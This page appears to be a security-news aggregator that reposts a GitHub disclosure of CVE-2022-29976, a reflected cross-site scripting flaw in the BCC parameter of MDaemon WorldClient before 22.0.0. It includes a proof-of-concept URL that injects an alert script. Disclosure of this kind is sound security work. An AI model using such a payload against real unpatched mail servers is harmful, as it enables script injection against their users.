Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-29976: MDaemon-/MDaemon XSS at BCC endpoint at main · haxpunk1337/MDaemon-

An Authenticated Reflected Cross-site scripting at BCC Parameter was discovered in MDaemon before 22.0.0 .

CVE
#xss#auth

Permalink

main

Switch branches/tags

MDaemon-/MDaemon XSS at BCC endpoint****

Go to file

  • Go to file

  • Copy path

  • Copy permalink

haxpunk1337 Create MDaemon XSS at BCC endpoint

Latest commit 820ea2b Apr 25, 2022

History

1 contributor

Users who have contributed to this file

9 lines (5 sloc) 243 Bytes

Raw Blame

  • Open with Desktop
  • View raw
  • Copy raw contents
  • View blame

Product: MDaemon

Status: Fixed at version 22.0.0

Poc

https://localhost/WorldClient.dll?Session=<session_cookie>&View=Compose&ReturnConfig=1&t=&spellcheck&cc=GTN&bcc=%22%3E%3Cscript%3Ealert(%27XSS_TEST_BY_GTN%27)%3C/script%3E

XSS executed

Related news

CVE-2022-29976: MDaemon-/MDaemon XSS at BCC endpoint at main · haxpunk1337/MDaemon-

An Authenticated Reflected Cross-site scripting at BCC Parameter was discovered in MDaemon before 22.0.0 .

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907